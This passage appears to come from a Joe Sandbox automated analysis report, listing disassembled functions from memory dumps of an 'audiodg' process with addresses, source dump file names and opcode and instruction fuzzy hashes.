                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5fc1bc383ecffe1ac394426b09994ef6bad3813c862338c8155e29ff3111a62
                                  • Instruction ID: 824a2ced1dc1d8eb362e7f809f8cca17f1794c6325ed782fa6857c4d893bdf40
                                  • Opcode Fuzzy Hash: a5fc1bc383ecffe1ac394426b09994ef6bad3813c862338c8155e29ff3111a62
                                  • Instruction Fuzzy Hash: 23B10371E0950E4FEBB8DB64C864BECB7A2FF54710F0142BAD00DE71A6DE782A458B54
                                  Function 00007FFD9BAA1758 Relevance: .3, Instructions: 288COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b3b2dec3811fa67c004430ed5c1f5a1a756d045dbf64f11308c553d972687bd
                                  • Instruction ID: e5930cdfeab4a89fb83b705cbd549d3611de460aff24f71964c88fdf39382780
                                  • Opcode Fuzzy Hash: 2b3b2dec3811fa67c004430ed5c1f5a1a756d045dbf64f11308c553d972687bd
                                  • Instruction Fuzzy Hash: 2591E131B0DA894FDB68DF5C88616B977D3EFE9300B15417AE49DC7296DE20AC02C780
                                  Function 00007FFD9BAAC528 Relevance: .3, Instructions: 274COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f8a3e9a3c92c3bf607f0d0c0918761d5d2c0a17c04c5b1a0b3cf5efd8df0e9a
                                  • Instruction ID: 3f06c639bea16e6a8366dd1dc1109d9b748defe42f64340c8a5f4a7df1a9b8f9
                                  • Opcode Fuzzy Hash: 6f8a3e9a3c92c3bf607f0d0c0918761d5d2c0a17c04c5b1a0b3cf5efd8df0e9a
                                  • Instruction Fuzzy Hash: 40911832B0D65A4FE725BB6CAC214F93BA0EF1533AB0502B7E559CA0E3DA2C7545C390
                                  Function 00007FFD9BAAC5FD Relevance: .2, Instructions: 250COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3d6d4fc973a85f81d7a88655a9d2da299ab557bab3a26f3753cc62902918cf63
                                  • Instruction ID: a642942ede5ecd4ec8fe020a8d89eb8cc9838e3bade6479369036048b932490f
                                  • Opcode Fuzzy Hash: 3d6d4fc973a85f81d7a88655a9d2da299ab557bab3a26f3753cc62902918cf63
                                  • Instruction Fuzzy Hash: 7C710526B0D6664AE325B7ACBC214E93B50EF5533EB0942B7E59DCD0E7EE1C3045C2A4
                                  Function 00007FFD9BAABD28 Relevance: .2, Instructions: 243COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4978caed0dc49678d75e8161fe58c8736d70ffe0b03c4e9d16a2e542711bb907
                                  • Instruction ID: 0679dbed0810add20de03e068a644205125c3d9a3ba958fb029cf720a0a9dd6e
                                  • Opcode Fuzzy Hash: 4978caed0dc49678d75e8161fe58c8736d70ffe0b03c4e9d16a2e542711bb907
                                  • Instruction Fuzzy Hash: 6E81A030A4E78D8FE7669B7488692E97FB0EF16300F4645FBD448C70B2DA78A648C751
                                  Function 00007FFD9BAAC5B8 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2758a84d6c1116d383a73918217a4559c2369799e1b5562e3b5388d33ef9a088
                                  • Instruction ID: 1ffd57b69034f2e7ae71a64b71f73d2f0500acccf4534e04542bc92e787a6d20
                                  • Opcode Fuzzy Hash: 2758a84d6c1116d383a73918217a4559c2369799e1b5562e3b5388d33ef9a088
                                  • Instruction Fuzzy Hash: AB610922B0D6664AE326B7ACBC214F97B60EF1533AB0542B7E59DCD0D3DA2C3445C3A0
                                  Function 00007FFD9BAB38FA Relevance: .2, Instructions: 189COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5c909290532e31d4e08028fca637c7f31e2aaa8262c72e47d39a4685aac98ff6
                                  • Instruction ID: 06b8704ea6ab9aa27f3d4ca1673cc0ac8ef31c99cc11de9cdbce1082689b4930
                                  • Opcode Fuzzy Hash: 5c909290532e31d4e08028fca637c7f31e2aaa8262c72e47d39a4685aac98ff6
                                  • Instruction Fuzzy Hash: 75517A37708A794BD720FBACECA56EA7BD0FF553B6B0404B7D259CA092D9606105CB90
                                  Function 00007FFD9BAA1D6D Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ddd67da109791222d891a23be5e940d1a7dd288c97caccdc4c976ff5c418dde6
                                  • Instruction ID: a94a700a077bf13b3cc94fb8509092693d13a9ca71e9d57bc65e694bc1150758
                                  • Opcode Fuzzy Hash: ddd67da109791222d891a23be5e940d1a7dd288c97caccdc4c976ff5c418dde6
                                  • Instruction Fuzzy Hash: 1751DE31B18B894FDB68DF4888645BA77E2FFE9304B15457EE45AC7296CE34E802C780
                                  Function 00007FFD9BAABD70 Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0aa163f1166657b9afe7a4870d372b34e8aee413e2d13590955bbd0d8543a52
                                  • Instruction ID: 2c0bbc7010bdcd93debe7ef65e546076838b08553cdd8cbc5ea6d367fcb86a10
                                  • Opcode Fuzzy Hash: f0aa163f1166657b9afe7a4870d372b34e8aee413e2d13590955bbd0d8543a52
                                  • Instruction Fuzzy Hash: 14518530A5E78E8FE7669B7488251F97FB0FF16300F4505BBD458C60E2EA78A648C751
                                  Function 00007FFD9BAA35B5 Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1d2b09b33f35883c0ba0e20ce02f8dd85068824ab737db92d18aa6bde0b0ce6
                                  • Instruction ID: 0db6722447dae196cccac80a39055d21d772dfa029c1fd55c4deba07d29d921d
                                  • Opcode Fuzzy Hash: b1d2b09b33f35883c0ba0e20ce02f8dd85068824ab737db92d18aa6bde0b0ce6
                                  • Instruction Fuzzy Hash: 7B51E231A1994E8FEB98EB68C8667BD7BE2FF59304F4101B9D00EC72D6DE7469018B50
                                  Function 00007FFD9BAAC6D3 Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8047d915abfc8cadd8f5026a8c66acde189b2d1d4b0ab5570393082cec4a34ee
                                  • Instruction ID: 5994e587a2fa12221e06e73a63dd005b0eb87236ea7bcbdb5aa81ad2441d6212
                                  • Opcode Fuzzy Hash: 8047d915abfc8cadd8f5026a8c66acde189b2d1d4b0ab5570393082cec4a34ee
                                  • Instruction Fuzzy Hash: 38510A26B0D6564BF726B7ACAC714F93B60DF1633AB0502B7E55DC90E3DA2C3545C2A0
                                  Function 00007FFD9BAAAD60 Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 703afea219d3c0b2980270b035cc2977d07dfaf626955f0f7b9fe751c61897da
                                  • Instruction ID: bcf7714c16675e3d514e8476424f01035409db62e7cb5747d7751a200383ef41
                                  • Opcode Fuzzy Hash: 703afea219d3c0b2980270b035cc2977d07dfaf626955f0f7b9fe751c61897da
                                  • Instruction Fuzzy Hash: 9851AE30A0A64E8FDB69EF64C8682BD7BB1FF19304F4508BED419C61E2DB75A644CB10
                                  Function 00007FFD9BAABDE0 Relevance: .2, Instructions: 151COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9e18206996d579271af8fb6ddea9fa797d288533a7d566e89b25d2e8f474371
                                  • Instruction ID: 9b3953ecc08b2f70b1349c5d74ea523b7211d29010262e7055f2bb7e6f0b19a4
                                  • Opcode Fuzzy Hash: c9e18206996d579271af8fb6ddea9fa797d288533a7d566e89b25d2e8f474371
                                  • Instruction Fuzzy Hash: 0C51A130A5E78E8FDB669F6488282F97BB0FF06300F4505BBD458C60E2DB78A648C751
                                  Function 00007FFD9BAA3205 Relevance: .1, Instructions: 149COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c29b11615f7d03724966a2ed35083b1a4fb495719fcf30c3a14f6069200d143
                                  • Instruction ID: bc5ca0014a26e2e7da87d1e375986b89b7f8ddd1161b4ef368781d8cb60c34ae
                                  • Opcode Fuzzy Hash: 2c29b11615f7d03724966a2ed35083b1a4fb495719fcf30c3a14f6069200d143
                                  • Instruction Fuzzy Hash: 40512D70E0A60D8FEB64EB94C4646ECB7F2EF58310F51417AD009E71A1DE786A44CB60
                                  Function 00007FFD9BAABB0A Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14e143f502c9df38f085e48ce132d3f7973c47e9338e6b6955dedc3f4fb67e3d
                                  • Instruction ID: 21813b1bb434530979804562a56d0520c8129154b75566f598710dd1858f5189
                                  • Opcode Fuzzy Hash: 14e143f502c9df38f085e48ce132d3f7973c47e9338e6b6955dedc3f4fb67e3d
                                  • Instruction Fuzzy Hash: 0A418C30E0A64D8EEB64EFA4C8686FD7BE1EF19300F41457AD019E31E5DA78A6448B20
                                  Function 00007FFD9BAA371F Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f5ecd7a2bfe17123b3a91af2d4d9ee0238a7edb0a774237c6be84d2204aaf7c
                                  • Instruction ID: 6239307fc687c4a17238002f0fce0741e6cac3bd223028ef0066ad5e799e03a2
                                  • Opcode Fuzzy Hash: 2f5ecd7a2bfe17123b3a91af2d4d9ee0238a7edb0a774237c6be84d2204aaf7c
                                  • Instruction Fuzzy Hash: 73419672A1990D4FE758DF5CD8653A87FE2EB99324F5142BED019C72D9CBF414058B80
                                  Function 00007FFD9BAB6E79 Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 621807c862d1568a73fe3fe28ae90c9a8952a21bce91731a177465970151d510
                                  • Instruction ID: fa0588ed74d29d20b6dbf5b0de88f3172127c73d9d1f659aade4c36f338f7930
                                  • Opcode Fuzzy Hash: 621807c862d1568a73fe3fe28ae90c9a8952a21bce91731a177465970151d510
                                  • Instruction Fuzzy Hash: C441D130E0A61E8FEB64DFA8C4646EDB7F1FF08300F01417AD029D71A2CB78AA448B40
                                  Function 00007FFD9BAAC7E0 Relevance: .1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a65fe2002a588268a3a9fa5a7b8ef3eb64015b2bf1bc77a8119683c9bbf08a90
                                  • Instruction ID: a579f6471563c9e9028690b8e547ddaca3180a5bd3089f00ae2d7bb91861ea46
                                  • Opcode Fuzzy Hash: a65fe2002a588268a3a9fa5a7b8ef3eb64015b2bf1bc77a8119683c9bbf08a90
                                  • Instruction Fuzzy Hash: 5E312531A0E38A4FE716AB7898754F97FB0EF16329B0501FBE459CA0E3DA386444C751
                                  Function 00007FFD9BAAC064 Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 81d974c97e2de96e34c1dc64ea42cf3c41b4a8c144e74bca4530e149d8c248a0
                                  • Instruction ID: 5001e1d9fd37df29a8113954feb363ab6a2a1b563af9cb226b730dea40b73ce6
                                  • Opcode Fuzzy Hash: 81d974c97e2de96e34c1dc64ea42cf3c41b4a8c144e74bca4530e149d8c248a0
                                  • Instruction Fuzzy Hash: E431BB74F1991D9FEBA4EB98C8A56BCB7F6FF58300F51013AD00DE3292DE6869418B50
                                  Function 00007FFD9BAB7515 Relevance: .1, Instructions: 98COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db6814f14e24a0f2d9e203e35757cd6eb085abb57a2de226e2d3bdabf9ee0e4a
                                  • Instruction ID: 3606119a35717152eb0aaaccb30a77e9a4375014a197ba82e55fcd59d6162fcf
                                  • Opcode Fuzzy Hash: db6814f14e24a0f2d9e203e35757cd6eb085abb57a2de226e2d3bdabf9ee0e4a
                                  • Instruction Fuzzy Hash: E031B430E0962E8FEB65EBA4C868AED77E1FF19310F01457AD429D71A5DFB4A9448F00
                                  Function 00007FFD9BAAC0DC Relevance: .1, Instructions: 93COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baaa000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d5d94d54aa1824919f4a6ca8c23fe134f164858854c7ebf939f8a07c074187f
                                  • Instruction ID: 059a10c0995fb91e0823050156918eac3f8d248e62d30566ccd5e893a5dbe1ba
                                  • Opcode Fuzzy Hash: 9d5d94d54aa1824919f4a6ca8c23fe134f164858854c7ebf939f8a07c074187f
                                  • Instruction Fuzzy Hash: 3421F074F1991D8FEBA4EBA8C8656BCBBF6FF59300F51012AD00DE3292DE6469418B50
                                  Function 00007FFD9BAB6C11 Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 345d39d0e77c6a0c1d7a105ad4edec5690717d3b5c5bb6438a269c2ba86cdf74
                                  • Instruction ID: 78b7a576151ae1aeed9b7b81aec3df273c2a14cef174de09281915fcea3723fe
                                  • Opcode Fuzzy Hash: 345d39d0e77c6a0c1d7a105ad4edec5690717d3b5c5bb6438a269c2ba86cdf74
                                  • Instruction Fuzzy Hash: B9218E30A0A60E8FEBA8EF68C4656BE77A1FF19305F00457AD42DC71A6DE75A5508B40
                                  Function 00007FFD9BAB6DED Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ec13094b05e8e03992a146fc9094d593f8319d3d356ed0e4e6db0654f3602b9
                                  • Instruction ID: 461bfef7de51e86fa35ed9209d8035d81b11c0156474b0b0b9d78d355ca837db
                                  • Opcode Fuzzy Hash: 1ec13094b05e8e03992a146fc9094d593f8319d3d356ed0e4e6db0654f3602b9
                                  • Instruction Fuzzy Hash: DB214630A0AA4E4FEB69DF68C4B62B977A1FF58304F0540BED42DC60E2CE75A500CB40
                                  Function 00007FFD9BAB6D55 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c0bf29aa5ccfec843860b3d911f39f3a11a33dff74b93100e788dccfd409367
                                  • Instruction ID: 5b2d70078cc8b698d7ca863ace55c337a8c15d443e3b7e4db065e8cce0685fce
                                  • Opcode Fuzzy Hash: 0c0bf29aa5ccfec843860b3d911f39f3a11a33dff74b93100e788dccfd409367
                                  • Instruction Fuzzy Hash: B321E430A0AA4E8FEFA9EF5888B52B977A0FF15304F0144BED42DC61A2CE75A504CB40
                                  Function 00007FFD9BAB73A1 Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53d2df0f2cdc2a89ad3678df81d8de5f88da8620800506617167f6c3966cda67
                                  • Instruction ID: dc7a0fecc3f9b0794122c758f56e23f5d4b18eca0bebe98162daaf3898c83d8a
                                  • Opcode Fuzzy Hash: 53d2df0f2cdc2a89ad3678df81d8de5f88da8620800506617167f6c3966cda67
                                  • Instruction Fuzzy Hash: 9F215031A0951E8FDB65EF64C4A95BD77E0FF18305F01457AD82DC71A1DBB5AA508B00
                                  Function 00007FFD9BAA32D6 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 95081c3c1b791b80e01a1507630edde584574970978533a2944c36b5d71d89a6
                                  • Instruction ID: d624829c38cc17be527e4a0b35061edc7bc0830bfb634810d1ca3cdfd9bd09da
                                  • Opcode Fuzzy Hash: 95081c3c1b791b80e01a1507630edde584574970978533a2944c36b5d71d89a6
                                  • Instruction Fuzzy Hash: 05212B71E0961D8FEB64EB98C454AECBBF2FF58311F51417AD009E72A1CE786A40CB60
                                  Function 00007FFD9BAA3408 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7507d76d90b196db1454cc4fb2f8a63bac73a2817841aaf30d5c5b5d48617606
                                  • Instruction ID: bfb2ac1e784b2e0e4ad079223de5d265e267f4bb8e74d71bbd88b43e418323b3
                                  • Opcode Fuzzy Hash: 7507d76d90b196db1454cc4fb2f8a63bac73a2817841aaf30d5c5b5d48617606
                                  • Instruction Fuzzy Hash: 2A21A13094E68A8FD753ABB488686A57FF4FF17310F0604FAD059CB0B2DA789545CB21
                                  Function 00007FFD9BAB20A8 Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d7a10651753965a6b8938e7d3d068ca38ab597bdd642405716c48ac4bed34f3
                                  • Instruction ID: 06e02238c7e2e631d6f5eefb8c779504edc0d7a94ff756797197a91c5385c27e
                                  • Opcode Fuzzy Hash: 0d7a10651753965a6b8938e7d3d068ca38ab597bdd642405716c48ac4bed34f3
                                  • Instruction Fuzzy Hash: E021D03094E3CA4FDB179BB098755E43FB0AF07204F0A04EFD499CB0A3D96A6555CB12
                                  Function 00007FFD9BAB7A79 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c726f17e3d5bdc8d60a8e8542152160e3c9a467ee33c7838a516d2116c7a8ca6
                                  • Instruction ID: d53c7349435b7a71a1330fff3fc7ce490a7d36627dca7d04078d251ad390d3cd
                                  • Opcode Fuzzy Hash: c726f17e3d5bdc8d60a8e8542152160e3c9a467ee33c7838a516d2116c7a8ca6
                                  • Instruction Fuzzy Hash: EA21CF30A0A65E8FDB99EF64C8655B93BA0FF15304F0104BED42EC60E2DEB5AA40CB00
                                  Function 00007FFD9BAB74A9 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 977320de77abf3a1e751be7b00e09f1604d5c50008672c55044989a978b1d9c6
                                  • Instruction ID: df716ec4a5db576771b6e5fe1a8217a5f034554f0f1347efc675b36c0219999d
                                  • Opcode Fuzzy Hash: 977320de77abf3a1e751be7b00e09f1604d5c50008672c55044989a978b1d9c6
                                  • Instruction Fuzzy Hash: E621E730A0A55E4FEB69EB74C8695B97BE0FF05301F0149B6D42DC70A6EEB4A940CB11
                                  Function 00007FFD9BAA0A01 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9baa0000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 22fcfd4cc1f5f0d002f8ad727d0e09cab9ffd6177805841039aafddb0ad0de37
                                  • Instruction ID: 32e706953a4def8286b41b012267ddf8e9b8e1af86e4f7c547536578e1a1b634
                                  • Opcode Fuzzy Hash: 22fcfd4cc1f5f0d002f8ad727d0e09cab9ffd6177805841039aafddb0ad0de37
                                  • Instruction Fuzzy Hash: 5111C131F0A54E4FE7A0EBA8C8691BD7BE2FF58700F4245B6D41CC70A6EE74A6448750
                                  Function 00007FFD9BAB2533 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2975453936.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffd9bab1000_audiodg.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52c6eb457864e09ce4f56dcb244ba0ae2692fadb0f466f2d199af9d3586c47c5
                                  • Instruction ID: 04a6786a596d59611f4820564eeac7441b0146426d2703e5adde7066f382e5a8
